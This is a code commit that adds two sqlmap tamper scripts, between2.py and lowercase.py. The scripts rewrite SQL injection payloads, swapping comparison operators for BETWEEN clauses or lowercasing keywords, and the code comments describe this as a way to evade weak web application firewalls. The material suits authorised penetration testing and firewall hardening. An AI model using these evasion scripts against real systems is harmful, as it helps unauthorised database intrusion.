Merge 2717e63053 into e0fb21c26a

2025-08-03 20:00:10 +03:00 · 2014-04-21 19:59:29 +00:00 · 2014-04-21 19:59:29 +00:00 · 8e90fe05b5
commit 8e90fe05b5
parent e0fb21c26a 2717e63053
2 changed files with 117 additions and 0 deletions
--- a/tamper/between2.py
+++ b/tamper/between2.py
@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+"""
+Andrew Kitis of Asterisk Information Security
+@nanomebia
+www.asteriskinfosec.com.au
+04-2014
+
+modified from the original "between.py" script provided by the sqlmap developers
+
+"""
+
+import re
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
+    and replaces the less than operator ('<') with 'BETWEEN 0 AND #''
+
+    Tested against:
+        * Microsoft SQL Server 2005
+
+    Notes:
+        * Useful to bypass weak and bespoke web application firewalls that
+          filter the greater than character
+        * The BETWEEN clause is SQL standard. Hence, this tamper script
+          should work against all (?) databases
+        * Can be handy if the original between script is working for some queries
+            but not others
+
+    >>> tamper('1 AND A > B--')
+    '1 AND A NOT BETWEEN 0 AND B--'
+    >>> tamper('1 AND A < B--')
+    '1 AND A BETWEEN 0 AND B--'
+    """
+
+    retVal = payload
+
+    if payload:
+        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
+
+        if match:
+            _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
+            retVal = retVal.replace(match.group(0), _)
+        else:
+            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload)
+            if payload:
+                match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^<]+?)\s*<\s*([^<]+)\s*\Z", payload)
+
+                if match:
+                    _ = "%s %s BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
+                    retVal = retVal.replace(match.group(0), _)
+                else:
+                    retVal = re.sub(r"\s*<\s*(\d+|'[^']+'|\w+\(\d+\))", " BETWEEN 0 AND \g<1>", payload)
+
+    return retVal
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@ -0,0 +1,54 @@
+#!/usr/bin/env python
+
+"""
+Andrew Kitis of Asterisk Information Security
+@nanomebia
+www.asteriskinfosec.com.au
+04-2014
+
+modified from the original "randomcase.py" script provided by the sqlmap developers
+
+"""
+
+import re
+
+from lib.core.data import kb
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def tamper(payload, **kwargs):
+    """
+    Replaces each keyword character with lower case value
+
+    Tested against:
+        * Microsoft SQL Server 2005
+
+    Notes:
+        * Useful to bypass very weak and bespoke web application firewalls
+          that has poorly written permissive regular expressions
+        * This tamper script should work against all (?) databases
+        * Some web applications don't like uppercase characters, so forcing
+            everything to lowercase can work.
+
+    >>> tamper('INSERT')
+    'insert'
+    """
+
+    retVal = payload
+
+    if payload:
+        for match in re.finditer(r"[A-Za-z_]+", retVal):
+            word = match.group()
+
+            _ = str()
+
+            for i in xrange(len(word)):
+                _ += word[i].lower()
+
+            retVal = retVal.replace(word, _)
+
+    return retVal